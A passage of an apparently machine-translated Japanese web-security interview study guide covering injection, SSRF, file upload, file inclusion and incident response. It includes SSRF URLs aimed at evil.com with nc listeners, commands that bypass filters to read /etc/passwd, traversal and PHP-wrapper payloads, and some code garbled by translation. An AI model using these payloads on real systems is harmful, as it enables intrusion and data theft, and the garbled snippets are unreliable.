3) SafeDog などのサーバー セキュリティ ソフトウェアを使用してクリーンアップします。

質問 29: 証明書を取得するためのテストは何ですか?

答え:

初の国際的な情報セキュリティ認証 - CISSP

情報セキュリティ国内認証——CISAW

情報セキュリティ国内認証 - CISP

情報セキュリティ技術実務検定の成り上がり——セキュリティ+IT

監査人必須の証明書 - CISA

質問 30: IIS サーバーに対してどのような保護措置を講じる必要がありますか?

答え:

1) Windows を最新の状態に保ちます。

2) IIS 防止ツールを使用する

3) デフォルトの Web サイトを削除する

4.) FTP および SMTP サービスが必要ない場合は、アンインストールしてください。

5.) 管理者グループとサービスを定期的に確認します。

6.) サーバーへの書き込みアクセスを厳密に制御する

7.) 複雑なパスワードを設定する

8.) Web サーバー上の共有を減らす/除外する

9.) TCP/IP プロトコルで NetBIOS を無効にします。

10.) TCP ポート ブロッキングを使用する

11.) *.bat および *.exe ファイルを再確認します。*.bat を週に 1 回検索します。

12.) IIS ディレクトリのセキュリティを管理します。

13.) NTFS セキュリティを使用します。

14.) ユーザーアカウントの管理

15.) Web サーバーを監査します。

質問 31: 侵入テストのプロセスは何ですか?

答え:

攻撃前: ネットワーク検査、ネットワーク スキャン、ネットワーク列挙

攻撃を受けている: 脆弱性情報を使用して侵入攻撃を実行し、許可を取得します。

攻撃後: 侵入後およびメンテナンス攻撃、ファイルのコピー、トロイの木馬の埋め込み、痕跡消去

質問 32: DVWA はどのように確立されますか?

答え:

xampp で Apache ミドルウェアと mysql を起動します (XAMPP (Apache+MySQL+PHP+PERL) は、強力な Web サイト構築統合ソフトウェア パッケージです)。

xampp の下の htdocs ディレクトリに dvwa を配置します。

ブラウザに http://127.0.0.1/dvwa と入力して使用してください。

面接質問理論1.0解答編

質問1: サーバーから受信したレスポンスからSQLインジェクションは大まかに何種類に分類できますか? (5点)

答え:

エラーレポートに基づくSQLインジェクション、ジョイントクエリ、スタックインジェクション、ブラインドSQLインジェクション(ブールインジェクション、遅延インジェクション、エラーインジェクション)

エラー挿入 (10 個の一般的なエラー報告関数: 最初の 3 つに答えるだけです)

抽出値()、

床()、

updatexml()、

exp()、

ポリゴン()、

マルチポイント()、

multilinestring()、

ラインストリング()、

マルチポリゴン()、

ジオメトリコレクション())

質問 2: SQL シェルの書き方と、一重引用符がフィルターされた場合はどうすればよいですか? (10点)

答え:

まず、次の条件が満たされているかどうかを判断します。

secure_file_priv パラメータが空であるかどうか、root 権限、ファイル権限、GPC がオフであるかどうか、関連する Web サイトのパス、および関連する読み取りおよび書き込み機能を把握しているかどうか。

ファイル書き込み機能: 出力ファイルへ、ダンプファイルへ

1. outfile 関数は複数行をエクスポートできますが、dumpfile は 1 行のデータのみをエクスポートできます。outfile 関数は、データをファイルに書き込むときに特別な形式変換を行います。

2. dumpfile は元のデータ形式を維持します

ファイル読み込み関数:load_file()

関連する書き込み権限があるかどうかを確認します。該当する場合は、関連するファイル書き込み機能を使用して、Web サイトのパスにコードを書き込みます。一重引用符フィルタリングがあります。文の内容を 16 進数でエンコードするか、ワイド バイトを使用してみてください。フィルタリングがない場合は、sqlmap –os-shell を直接使用します。

質問 3: xss は大きく分けて何種類あり、それぞれの違いは何ですか? (5 点)

答え:

蓄積型、反射型、DOM型

ストレージの種類:

関連する XSS 攻撃コードをデータベースに直接保存し、ユーザーは関連するコードの実行をトリガーするために関連するインターフェイスにアクセスするだけで済みます。ユーザーが積極的にトリガーする必要はありません。

反射タイプ:

関連する xss コードは、関連するページの応答に反映されます。これには、関連するユーザーがアクティブにトリガーする必要があり、ユーザーはデータを送信します。

DOM タイプ:

ページの DOM ノードを変更して xss を作成する

質問4 : ssrf の脆弱性についての理解を説明してください (ssrf とは何か、その使用方法、IP 上の通常のフィルタリングをバイパスする方法、DNS リバインディング攻撃) (20 点)

質問1: ssrfとは何ですか?

答え:

サーバー側リクエスト フォージェリ (SSRF) とは、攻撃者がサーバーのすべてのアクセス許可を取得できなかった場合に、サーバーの脆弱性を利用して、構築されたリクエストをサーバーとしてサーバーが配置されているイントラネットに送信することを指します。SSRF 攻撃は通常、外部ネットワークに直接アクセスできない内部システムをターゲットとします。

質問2:活用方法

答え:

SSRF は、外部ネットワーク、サーバーが配置されている内部ネットワーク、およびローカル エリアでポート スキャンを実行したり、内部ネットワークまたはローカルで実行されているアプリケーションを攻撃したり、ファイル プロトコルを使用してローカル ファイルを読み取ることができます。

Redis の操作に使用されるプロトコル:

辞書プロトコル

ファイルの読み取りに使用されるプロトコル:

ファイル://

リバウンドシェルはどのようなプロトコルを使用しますか?

ホリネズミ://

url/ssrf.php?url=http://evil.com/gopher.php

<?php

        header('場所: gopher://evil.com:12346/_HI%0AMultiline%0Atest');

?>

# nc -v -l 12346

sftp://

ssrf.php?url=sftp://evil.com:11111/

$ nc -v -l 11111

dict://

ssrf.php?dict://攻撃者:11111/

$ nc -v -l 11111

tftp://

ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET

# nc -v -u -l 12346

問題 3: IP バイパス (フィルタリングに正規表現を使用)

答え:

変更された IP アドレスは 192.168.0.1 のように記述されます。

1. 8 進形式: 0300.0250.0.1

2. 16 進形式: 0xC0.0xA8.0.1

3. 10 進整数形式: 3232235521

4. 16 進整数形式: 0xC0A80001

5. 2 桁の組み合わせ: 1.1.278 / 1.1.755

6. 3 桁の合計: 1.278 / 1.755 / 3.14159267

問題 4: DNS リバインディング攻撃

答え:

質問 4 の説明: ユーザーがリクエストした URL パラメーターに対して、サーバーはまず DNS 解決を実行し、DNS サーバーから返された IP アドレスを判断し、ブラックリストに含まれている場合、リクエストは禁止されます。

ドメイン名解決のために DNS サービスが最初に要求されたときと、サーバーが 2 回目に URL を要求したときとの間には時間差があり、この時間差を利用して DNS 再バインド攻撃が実行される可能性があります。

DNS リバインド攻撃を完了するには、ドメイン名が必要で、このドメイン名の解決を独自の DNS サーバーに割り当て、制御可能な DNS サーバーに解決サービスを書き込み、TTL 時間を 0 に設定します。このようにして攻撃が実行されます。完全な攻撃プロセスは次のとおりです。

1. サーバー側は URL パラメーターを取得し、最初の DNS 解決を実行して、非イントラネット IP を取得します。

2. 取得した IP を判定し、ブラックリストに載っていない IP であれば検証をパスします。

3. サーバーが URL にアクセスすると、DNS サーバーが設定している TTL が 0 であるため、再度 DNS 解決が行われ、今度は DNS サーバーはイントラネット アドレスを返します。

4. 検証がバイパスされたため、サーバーはイントラネット リソースへのアクセス結果を返します。

質問 5: ファイルアップロードの一般的な使用方法 (10 点)

質問 1: 一般的なバイパス方法

答え:

フロントエンド js 検証: js を無効にするか、burp でパッケージを直接変更します。

ファイル タイプの検証: http ヘッダーのコンテンツ タイプ、MIME タイプを変更します。

ブラックリスト: 特別な解析可能なサフィックスのアップロード、.htaccess、.user.ini のアップロード、サフィックスの大文字と小文字の区別、ドットのバイパス、スペース、::$DATA のバイパス、解析の脆弱性との連携、二重サフィックス名のバイパス

ホワイトリスト: MIME バイパス、%00 トランケーション、0x00 トランケーション、0x0a トランケーション

ファイル コンテンツの検証: ファイル ヘッダー チェック、getimagessize() のブレークスルー、exif_imagetype() のブレークスルー、セカンダリ レンダリング

その他:条件付き競争

関連ミドルウェアの解析脆弱性: iis6.0、iis7.0、iis7.5 解析脆弱性、Apache 解析脆弱性、nginx 解析脆弱性

質問 2: サフィックス名の解決方法を決定する

答え:

ファズテスト

質問 6: 一般的な危険な機能のコマンド インジェクション (5 点)

答え:

PHP の機能:

• システム

• 実行

• パススルー

• シェル_exec

• ポペン

• proc_open

• 評価

• 主張する

• パススルー

• pcntl_exec

• call_user_func_array

• 関数の作成

Python関数:

• システム

• ポペン

• subprocess.call

• スポーン

ジャワ:

• java.lang.Runtime.getRuntime().exec(コマンド)

質問 7: PHP の一般的なコマンド区切り文字 (5 点)

答え:

%0a、%0d、\r、\n、;、&、&&、|、||

質問 8: 一般的なバイパス方法 (スペース バイパス、ブラックリスト) (10 点)

質問 1: スペースを回避する方法

答え:

• < シンボル猫<123

• \t / %09

• ${IFS} ({} は切り捨てに使用されます) たとえば、cat$IFS2 は変数名として IFS2 とみなされます。さらに、最後に $ を追加すると切り捨て効果が生じる可能性があります。$9 は現在のシステム シェル プロセスの 9 番目のパラメーターの保持者であり、常に空の文字列であるため、通常は $9 が使用されます。

問題 2: ブラックリストのバイパス

答え:

• a=l;b=s;$a$b

• Base64 エコー "bHM=" | Base64 -d

• /?in/?s => /bin/ls ワイルドカード文字の使用

• コネクタ cat /etc/pass'w'd

• 未定義の初期化変数 cat$x /etc/passwd

質問 9: ファイルには脆弱性が含まれています (10 点)

問題 1: ファイルに脆弱性フォーム、一般的な PHP 関数が含まれています

<?php include("inc/" . $_GET['file']); ?>

答え:

1. include (組み込みプロセス中にエラーが発生した場合、エラーが報告されますが、後続のステートメントの実行には影響しません)

2. include_once (一度だけ含める)

3. require (組み込みプロセス中にコードエラーが発生しました。後続のコードは実行されません)

4. require_once (1 回だけ含まれます)

質問 2: 一般的な封入フォーム

答え:

1. 同じディレクトリに file=.htaccess が含まれており、関連するファイルを現在のディレクトリに直接追加します。

2. ディレクトリトラバーサル?ファイル=../../../../../../../../../var/lib/locate.db

3. ログ挿入?file=../../../../../../../../../var/log/apache/error.log

4. 利用 /proc/self/environ

ログは、SSH ログや Web ログなどのさまざまなログ ソースを使用してテストできます。

質問 10: PHP 疑似関連付けの一般的な使用上の推奨事項と関連する使用条件 (10 点)

答え:

1.php://input

ポストデータストリームを取得可能

利用条件:

allow_url_include=オン

allow_url_fopen-オフ/オン

説明書:

ファイル =php://input

POST:phpinfo();

2.php://フィルター

指定したファイルのソースコードを取得できますが、include関数と組み合わせるとphp://filterストリームがphpファイルとして実行されます。したがって、通常は実行されないようにコーディングします。したがって、任意のファイル読み取りが発生します

利用条件:

allow_url_fopen=オフ/オン

allow_url_include=オフ/オン

説明書;

?file=php://filter/read=convert.base64-encode/resource=phpinfo.php

3.zip://

圧縮パッケージ内のファイルにアクセスできます。include 関数と組み合わせると、zip:// ストリームが PHP ファイルとして実行されます。これにより、任意のファイルの実行が可能になります。同様のタイプには、zlib:// および bzip2:// があります。

利用条件:

zip 圧縮パッケージである必要があります (ファイル形式が zip である限り、接尾辞は関係ありません)。

allow_url_fopen=オフ/オン

allow_url_include=オフ/オン

php >=5.2

説明書:

zip://[圧縮パッケージへの絶対パス]#[圧縮パッケージ内のファイル]

?file=zip://D:\zip.zip%23phpinfo.txt

4.phar://

zip:// と同様に、絶対パスと相対パスの両方を使用できます。

利用条件:

zip 圧縮パッケージである必要があります (ファイル形式が zip である限り、接尾辞は関係ありません)。

allow_url_fopen=オフ/オン

allow_url_include=オフ/オン

php >=5.2

説明書:

zip://[圧縮パッケージへの絶対パス]#[圧縮パッケージ内のファイル]

?file=zip://D:\zip.zip/phpinfo.php (zip:// との違いは、一方が # でもう一方が / であることです)

5.データ://

php://input にも似ています

利用条件:

allow_url_fopen=オン

allow_url_include=オン

説明書:

?file=data://,<?php phpinfo();

?file=data://text/plain,<php phpinfo();

?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

?file=data:text/plain,<php phpinfo();

?file=データ:テキスト/プレーン;base64,PD9waHAgcGhwaW5mbygpPz4=

質問 11: テンプレートのインジェクション (5 点)

答え:

テンプレート エンジンは、動的データを使用してコンテンツをレンダリングするために使用されます。このコンテキスト データは通常、ユーザーによって制御され、Web ページや電子メールなどを生成するためのテンプレートによってフォーマットされます。テンプレート エンジンは、コード構成 (条件ステートメント、ループなど) を使用してコンテキスト データを処理し、テンプレート内で強力な言語式を使用して動的コンテンツをレンダリングできるようにします。攻撃者がレンダリングされるテンプレートを制御できる場合、コンテキスト データを公開する可能性のある式を挿入したり、サーバー上で任意のコマンドを実行したりすることができます。

質問 12: 一般的なビジネス ロジックの脆弱性が発生する場所 (10 点)

答え:

1. 取引種類

支払った価格を変更する

支払いステータスを変更する

購入数量を負の数に変更します

金額を負の数に変更します

成功したリクエストを再生する

同時データベースロックの不適切な処理

2. アカウント

登録: 登録を上書きし、ユーザー名を繰り返し、登録をたどって既存のアカウントを推測します。

ログイン: クレデンシャルスタッフィング、アカウントハイジャック、アカウントパスワードを試行してアカウントをロックする

パスワードの取得: ユーザー名をリセットします。パスワードのリセット後、新しいパスワードは返却パッケージ内にあります。トークン検証ロジックはフロントエンドにあります。X-Forwarded-Host は正しく処理されません。

パスワード変更: 許可なくパスワードを変更します。パスワード変更時に古いパスワードの検証は行われません。

苦情: ID 偽造、ロジックバイパス

情報クエリ: 不適切な権限制限により不正なクエリが発生したり、ユーザー情報 ID が推測されてトラバーサルが発生したりする可能性があります。

3. 認証コード

認証コード:認証コードは再利用可能

検証コードは予測可能です

確認コードの強度が十分ではありません

確認コードには期限がない、または有効期限が長い

確認コードの推測数に制限はありません

検証コードが特別なパラメーターを渡しているか、バイパスするパラメーターを渡していません。

確認コードは返送されたパッケージから直接取得できます。

確認コードが更新されないか無効です

認証コードの数には制限があります

検証コードはパケットで返されます

Cookie バイパスを変更する

返品パッケージのバイパスを変更する

検証コードはクライアント側で生成または検証されます

検証コードはOCRまたは機械学習を使用した認識が可能

認証コードはSMS/電子メール攻撃に使用されます

質問 13: 不正な脆弱性にはいくつかの種類があります (10 点)

答え:

不正アクセス

水平方向のオーバーライド:

攻撃者は、自分と同じ権限を持つユーザーのリソースにアクセスできる

権限タイプは変更されず、ID は変更されます

垂直方向のオーバーライド:

低レベルの攻撃者が高レベルのユーザーのリソースにアクセスできる

権限 ID は変更されませんが、タイプは変更されます

クロスオーバーライド:

権限IDの変更、タイプの変更

質問 14: PHP と Java における逆シリアル化の原則 (10 点)

答え:

PHP は、serialize() と unserialize() の 2 つの関数を中心に展開します。シリアル化とは、オブジェクトを送信できる文字列に変換することです。サーバーが逆シリアル化された文字列を受信して​​フィルター解除できる場合、変数がこれらのマジック メソッドに直接入力される場合、重大な抜け穴が発生しやすくなります。

0:7:" chybeta":1:{s:4:"test" ;s:3:" 123";} ここでの 0 は、オブジェクトが保存されていることを意味します。配列で渡すと、それは文字 a。7 はオブジェクトの名前が 7 文字であることを意味します。「chybeta」はオブジェクトの名前を意味します。1 は値があることを意味します。{s:4:"test";s:3:"123" ;} , s は文字列を表し、4 は文字列の長さを表し、「test」は文字列の名前であり、以下も同様です。unserialize() に渡されるパラメータが制御可能である場合、慎重に構築されたシリアル化された文字列を渡すことができます。オブジェクト内の変数や関数を制御することもできます。

Java シリアル化とは、Java オブジェクトをバイト シーケンスに変換して、メモリ、ファイル、データベースへの保存を容易にするプロセスを指します。ObjectOutputStream クラスの writeObject() メソッドでシリアル化を実装できます。Java 逆シリアル化とは、バイト シーケンスを Java オブジェクトに復元するプロセスを指します。逆シリアル化には、ObjectInputStream クラスの readObject() メソッドが使用されます。

質問 15: 一般的なシェルの反発方法 (5 点)

答え:

bash リバウンド、nc リバウンド、powershell リバウンド、msf リバウンド、Cobalt ストライク リバウンド シェル、ew リバウンド、awk リバウンド、telnet リバウンド、socat リバウンド、さまざまな言語関連のリバウンド

質問 16: テスト対象の局を受け取ったらどうしますか (10 点)

答え:

1. 情報収集

1) サーバー関連情報 (実際のIP、システムタイプ、バージョン、オープンポート、WAFなど)

2) Web サイトの指紋認証 (CMS、CDN、証明書などを含む)、DNS 記録

3) c. Whois情報、名前、記録、電子メール、逆チェック用の電話番号(電子メールはソーシャルワーカーデータベースに失われ、ソーシャルワーカーが準備するなど)

4) サブドメイン名収集、サイドサイト、Cセグメントなど

5) Google ハッキング対象の検索、PDF ファイル、ミドルウェアのバージョン、脆弱なパスワードのスキャンなど。

6) Web サイトのディレクトリ構造をスキャンして、バックエンド、Web サイトのバナー、テスト ファイル、バックアップなどの機密ファイルを漏洩します。

7) 伝送プロトコル、一般的な脆弱性、exp、github ソースコードなど。

2. 脆弱性マイニング

1) Web サイトを参照して、サイズ、機能、特徴などを確認します。

2) ポート、弱いパスワード、ディレクトリなどをスキャンし、応答ポート上で rsync、heartbleed、mysql、ftp、ssh の弱いパスワードなどの脆弱性検出を実行します。

3) XSS、SQLインジェクション、アップロード、コマンドインジェクション、CSRF、Cookieセキュリティ検出、機密情報、通信データ送信、ブルートフォースクラッキング、任意ファイルアップロード、不正アクセス、不正アクセス、ディレクトリトラバーサル、ファイルインクルード、リプレイ攻撃(SMSボム攻撃) )、サーバーの脆弱性の検出、最後に不足しているスキャン ツールの使用などです。

3. 脆弱性の悪用と権限昇格

1) mysq| 権限昇格、serv-u 権限昇格、oracle 権限昇格

2) Windows のオーバーフロー権限昇格

3) Linux の汚れた牛、特権を昇格させるカーネルの脆弱性

4. テストデータのクリアとレポートの出力

1) ログとテストデータのクリーニング

2) 要約、修復計画を含む侵入テストレポートの出力

5. 再テスト

1) 新たな脆弱性の有無を検証・発見し、レポートを出力し、アーカイブする

質問 17: 一般的な暗号化アルゴリズム (20 点)

答え:

1. 対称暗号化アルゴリズム

暗号化と復号化には同じキーを使用します。

利点は、高速であり、大量のデータの暗号化に適していることです。

デメリットとしては、鍵を安全に保管する必要があり、暗号化側または復号化側が鍵を漏洩すると情報が漏洩してしまうことです。

一般的に使用される対称暗号化アルゴリズムには、DES、3DES、DESX、Blowfish、IDEA、RC4、RC5、RC6、AES などがあります。

2. 非対称暗号化アルゴリズム

対称暗号化とは対照的に、非対称暗号化には公開キー (Public Key) と秘密キー (Private Key) の 2 つのキーが必要です。公開鍵と秘密鍵はペアであり、公開鍵を使用してデータを暗号化した場合、対応する秘密鍵のみで復号化できます。対照的に、データが秘密キーで暗号化されている場合は、対応する公開キーのみがデータを復号化できます。

メリットとしては、公開鍵は誰でも知ることができ、公開鍵が漏洩しても情報漏洩には至らないが、秘密鍵が漏洩すると情報漏洩に繋がることである。

一般的に使用される非対称暗号化アルゴリズムには、RSA、ECC (モバイル デバイス用)、Diffie-Hellman、El Gamal、DSA (デジタル署名用) があります。

3. ハッシュアルゴリズム

ハッシュ アルゴリズム (ハッシュ ハッシュ アルゴリズム) の特徴は、一方向アルゴリズム、つまり不可逆性であることです。ユーザーはハッシュ アルゴリズムを使用して、対象の情報に対して特定の長さの一意のハッシュ値を生成できます。 , ただし、このハッシュ値を介して再利用することはできません. ターゲットの情報を取得します。

この特性により、ハッシュ アルゴリズムは通常、還元不可能なパスワードの保存や情報の完全性の検証などの場所で使用されます。

一般的に使用されるハッシュ アルゴリズムは、MD2、MD4、MD5、HAVAL、SHA、SHA-1、HMAC、HMAC-MD5、HMAC-SHA1 です。

質問 18: rsa の暗号化と復号化のプロセスを簡単に説明してください (20 点)

答え:

RSA 暗号化: 非対称キー、公開キー アルゴリズム RSA 暗号化は、順方向では解くのが非常に簡単ですが、逆方向では非常に複雑である一方向関数の特性を利用します。

2つの素数の乗算は容易だが合成数の分解は難しいという特徴を利用した暗号アルゴリズム。n=p1*p2、p1とp2が既知の場合はnを見つけるのは簡単ですが、nが既知の場合はp1とp2を見つけるのは困難です。

(m^e) mod n=c の場合、m、e、n がわかっている場合は c を見つけるのは簡単ですが、e、n、c がわかっている場合は m を見つけるのは困難です。

公開鍵 n および e の生成: 2 つの素数 p1 および p2 (n=p1*p2) をランダムに選択し、次に整数 e をランダムに選択します。e と φ(n) は互いに素です。

暗号化プロセス: (m^e) mod n=c、ここで、m は元の情報、c は暗号化された情報、n と e は公開鍵です。

復号化プロセス: (c^d) mod n=m、ここで d は復号化キーです。

質問 19: crc32 コリジョンの使用 (10 点)

答え:

CRC (冗長検査コード)、CRC32 は 32 ビットの検査値が生成されることを意味します。CRC32 を生成するとき、ソース データ ブロックのすべてのビットが操作に参加するため、データ ブロック内の 1 ビットだけが変更された場合でも、異なる CRC32 値が取得されます。この原理を使用して、暗号化されたファイルの内容を直接展開できます。 。CPU 能力の関係で、CRC コリジョンは圧縮ファイルが小さい場合にのみ使用できます。

問20:緊急時対応の具体的な手順(10点)

答え:

PDCERF モデル

1. 準備: テスト用のツールと人員を準備します。

2. 検出: 緊急イベントの監視: ファイアウォール、システム、Web サーバー、IDS/WAF/SIEM のログ、異常なユーザーまたは不正な操作を実行したユーザー、さらには管理者からのレポートを含む

3. 封じ込め: まず、被害の範囲を制御し、攻撃の影響が他の IT 資産やビジネス環境に広がるのを防ぎます。バックドアのブロックに直接すべてのエネルギーを費やさないように注意してください。次にやるべきことは、根本原因を見つけて完全に解決し、攻撃元をブロックして、ビジネスを通常のレベルに回復することです。

4. 根絶

5.回復する

6. フォローアップ: さまざまな監視に基づいて、他の攻撃行為や攻撃ベクトルがないことを判断し、その後、インシデントを振り返り、レポートを作成し、作業プロセスと作業軽減策を継続的に改善するための会議が行われます。

面接の質問 1

質問 1: PHP で絶対パスを使用するにはどうすればよいですか?

答え:

一重引用符はデータベースエラーの原因となります

間違ったパラメータまたは間違ったパスにアクセスする

phpinfoなどのクラスファイルを調べる

開発中の削除されていないテスト ファイルをスキャンします

グーグルハッキング

phpmyadmin レポートのパス:/phpmyadmin/libraries/lect_lang.lib.php

脆弱性を悪用して構成ファイルを読み取り、パスを見つける

存在しない画像を読み込むローカル画像読み取り機能や、アップロードポイントで正常にインポートできないファイルをアップロードするなど、Webサイトの機能を悪用する行為

質問 2: よく使用される侵入ツールは何ですか?最もよく使用されるのはどれですか?

答え:

げっぷ、nmap、sqlmap、awvs、ant Sword、Ice Scorpion、dirsearch、Yujian など。

質問 3: イントラネット サーバーへの XSS ブラインド タイピングの利用

答え:

釣りマネージャー

メッセージを収集する

質問 4: 銛攻撃と水飲み場攻撃は?

答え:

スピア攻撃: トロイの木馬プログラムを電子メールの添付ファイルとして使用してターゲット コンピュータに送信し、被害者が添付ファイルを開いてトロイの木馬に感染するように誘導することを指します。

水飲み場型攻撃:攻撃対象者のインターネット活動パターンを分析し、攻撃対象者が頻繁にアクセスするWebサイトの弱点を見つけ出し、Webサイトに侵入して悪意のあるプログラムを埋め込み、対象者がアクセスするのを待ちます。

質問 5: 仮想マシンのエスケープとは何ですか?

答え:

仮想マシン ソフトウェアまたは仮想マシン内で実行されているソフトウェアの脆弱性を悪用して、仮想マシン ホストのオペレーティング システムを攻撃または制御します。

質問 6: 中間者攻撃?

答え:

原理:

同一LAN内において、通常のネットワーク通信データを傍受し、データの改ざんや盗聴を行うことにより、

防衛:

ゲートウェイの MAC アドレスと IP アドレスを静的にホストにバインドします。

ゲートウェイ上のホスト MAC アドレスと IP アドレスをバインドする

ARPファイアウォールを使用する

質問 7: TCP の 3 ウェイ ハンドシェイク プロセスは?

答え:

最初のハンドシェイク: 接続を確立するとき、クライアントは syn パケット (syn=j) をサーバーに送信し、SYN_SEND 状態に入り、サーバーからの確認を待ちます。

2 回目のハンドシェイク: サーバーは syn パケットを受信し、クライアントの SYN (ack=j+1) を確認する必要があり、同時に SYN パケット (syn=k)、つまり SYN+ACK パケットも送信します。今度は、サーバーは SYN_RECV 状態に入ります。

3 回目のハンドシェイク: クライアントはサーバーから SYN+ACK パケットを受信し、確認パケット ACK (ack=k+1) をサーバーに送信します。パケットの送信後、クライアントとサーバーは ESTABLISHED 状態になり、ハンドシェイクが完了します。三者握手。

質問 8: 7 層モデルですか?

答え:

アプリケーション層、プレゼンテーション層、セッション層、トランスポート層、ネットワーク層、データリンク層、物理層

質問 9: クラウドのセキュリティについての理解

答え:

並列処理、グリッドコンピューティング、未知のウイルスの動作判定などの新興技術や概念を統合し、ネットワーク上の多数のクライアントを通じてネットワーク内のソフトウェアの異常な動作を監視し、インターネット上のトロイの木馬や悪意のあるプログラムの最新情報を取得し、自動解析・処理を行い、各クライアントにウイルス・トロイの木馬対策を配布

質問 10: WebSocket について学習しましたか?

答え:

WebSocket は、単一の TCP 接続上で全二重通信を行うためのプロトコルであり、その最大の特徴は、サーバーがクライアントにアクティブに情報をプッシュできることと、クライアントもサーバーにアクティブに情報を送信できることです。対話。

質問 11: DDOS とは何ですか? 何?CC攻撃とは何ですか?違いは何ですか?

答え:

DDOS:

分散型サービス拒否攻撃では、合理的なサービス要求を使用して過剰なサービス リソースを占有するため、正規のユーザーがサービス応答を受信できなくなります。

主な方法:

SYNフラッド

UDP フラッド

ICMP フラッド

接続フラッド

HTTP 取得

UDP DNS クエリ フラッド

CC攻撃:

フォーラムなどの大量のデータ操作を必要とするページに複数の一般ユーザーが継続的にアクセスすることをシミュレートし、サーバー リソースの浪費、CPU が長時間 100% になること、ネットワークの混雑が発生することをシミュレートします。

2 つの違い:

CC は Web ページを攻撃し、DDOS はサーバーを攻撃しますが、これらは防御がより困難です。

CC のしきい値は低く、DDOS には多数のサーバーが必要です。

CCは長く続き、DDOSは大きな影響を与える

質問1 2 : 陸攻とは何ですか?

答え:

DDOS 攻撃の一種である LAN サービス拒否攻撃は、同じ送信元アドレスと宛先アドレスを持つ慎重に作成されたなりすましデータ パケットを送信することにより、対応する保護メカニズムを持たないターゲット デバイスを麻痺させます。

質問 13: 情報はどのように収集しますか?

答え:

サーバー情報: IP、ミドルウェア、オペレーティング システム

ドメイン名 Whois、ipwhois、ネットワーク セグメントの所有権

サブドメインの検出

Webサイトディレクトリスキャン、インターフェース情報スキャン

ポートスキャン

主要エンジンの関連情報を検索

質問 14: CRLF インジェクション攻撃とは何ですか?

答え:

「復帰」および「改行」文字を HTTP ストリームに挿入することにより、Web サイトの改ざん、クロスサイト スクリプティング、ハイジャックなどが行われる可能性があります。

質問 15: フロントエンドとバックエンドの両方の観点から XSS を防止しますか?

答え:

フロントエンド:

ユーザー入力の特殊文字はフィルタリングされ、HTML エンティティにエスケープされます。

ユーザー出力エンコーディング

後部:

実体化されたコーディング

ファンクションフィルター

文字の長さを制限する

質問 16: 港の安全を守るにはどうすればよいですか?

答え:

WAF、IDS、IPSなどのデバイスを活用する

危険なサービス ポートは外部アクセスを禁止するか、IP アクセスを制限します

サービスの定期更新バージョン

質問 17: Webshel​​l 検出のアイデアは?

答え:

静的検出: シグネチャ、固有値、危険な関数の一致

動的検出: WAF、IDS、その他の機器

ログ検出: IP アクセス パターンとページ アクセス パターンに基づくフィルタリング

ファイル整合性の監視

質問 18: IIS Web サイトの脆弱性をテストするにはどうすればよいですか? (バージョンによって異なります)

答え:

https://mp.weixin.qq.com/s/5XV984kErF2Zhh-P5aoUwQ

質問 19: SQL インジェクションの問題の概要

答え:

https://mp.weixin.qq.com/s/frwK49IatUqUoT-4DR08GQ

質問 20: GPC とは何ですか? 有効になっている場合、それを回避するにはどうすればよいですか?

答え:

GPC:

php.ini 設定ファイルの Magic_quotes_gpc は、get、post、cookie で渡される一重引用符、二重引用符、バックスラッシュ、および NULL 文字にバックスラッシュを追加する機能を実装します。

バイパス:

PHP5 の GPC は $_SERVER を無視するため、http リクエスト ヘッダーに挿入できます。

二次噴射

ワイドバイトインジェクション

質問 21: Web で一般的に使用されている暗号化アルゴリズムは何ですか?

答え:

一方向ハッシュ暗号化 MD5、SHA、MAC

対称暗号化 AES、DES

非対称暗号化 RSA、RSA2

質問 22: XSS では Cookie を取得する以外に何ができますか?

答え:

管理者IPを取得する

xssworm

フィッシング攻撃

フロントエンドJSマイニング

キーロギング

スクリーンショット

キャリア(またはその他)のネットワークハイジャック

オペレーターのハイジャック: 広告

DNS ハイジャック: DNS を改ざんし、さまざまな手段でネットワークをハイジャックする

質問 23: DNS スプーフィングとは何ですか?

答え:

攻撃者がドメインネームサーバーになりすます不正行為

質問 24: バッファ オーバーフローの原則と防御策

答え:

原理:

バッファに書き込まれるデータの量がバッファの最大容量を超えると、バッファ オーバーフローが発生し、オーバーフローしたデータがハッカーによって悪用されてリモート コード実行の脆弱性が形成されます。

防衛:

オペレーティングシステムベースの防御

バッファ境界のチェック

安全なプログラミング

質問 25: ネットワーク セキュリティ インシデントへの緊急対応

答え:

インターネットからの切断: ハッカーによるさらなる操作や痕跡の削除を防ぐことができる状況では、インターネットからの切断を優先します。

フォレンジック: ログイン ログ、Web サイト ログ、サービス ログを分析してハッカーの IP を特定し、ハッカーが実行した操作を確認します。

バックアップ: サーバー ファイルをバックアップし、侵入の前後で変更されたファイルを比較します。

リークの検出: 上記の手順を使用して、ビジネスの弱点を見つけて修正します。

ウイルス対策: ハッカーが残したバックドア、Webシェル、管理アカウントを削除します。

追跡可能性: ハッカーの IP アドレス、侵入方法などによる。

記録: アーカイブ、防止

質問 26: 企業の内部セキュリティ

答え:

実名ネットワークの分離と重要なネットワーク セグメントにより、USB デバイスへのアクセスが禁止されます。

WIFI ネットワークの IP アドレスと MAC アドレスのバインドを無効にする

ネットワーク監視、IDS、IPS機器の導入

従業員の安全意識を向上させるための定期的な研修

質問 27: オンライン化する前にビジネスをテストする方法と、どのような角度からテストするか

答え:

セキュリティテスト: 製品の脆弱性、ページの脆弱性、サービスの脆弱性、機密情報の漏洩、ロジックの脆弱性、脆弱なパスワードを探します。

パフォーマンス テスト: ストレス テスト

機能完全性テスト

質問 28: アプリケーションに脆弱性がありますが、修復または無効化することができません。どうすればよいですか?

答え:

IP ホワイトリスト アクセスを制限する

WAF、IDS、ファイアウォール機器を利用する

質問 29: CSRF から保護するにはどうすればよいですか?

答え:

「HTTP リファラー」フィールドを検証する

トークンフィールドを追加して確認する

カスタムフィールドを追加して確認する

質問 30: ファイルのアップロードをバイパスするにはどうすればよいですか?

答え:

WAF バイパス:

アップロードフォームフィールドを変更する

フォームフィールドの大文字と小文字の置き換え

フォームフィールドのスペースを追加または削減する

フォームフィールド文字列の連結

二重ファイルアップロードフォームを作成し、二重ファイルを同時にアップロードする

エンコーディングバイパス

ジャンクデータパディングバイパス

ファイル名の大文字と小文字のバイパス

サーバー検出バイパス:

MIME タイプのバイパス

フロントエンド JS 検出パケット キャプチャとパケット変更バイパス

ブラックリスト バイパス: php3、asa、ashx、Windows 機能 (test.asp_、ストリーム機能)、Apache 解析の脆弱性

画像コンテンツ検出は、image horse を使用して .htassess バイパスをバイパスします

ホワイトリスト検出バイパス:

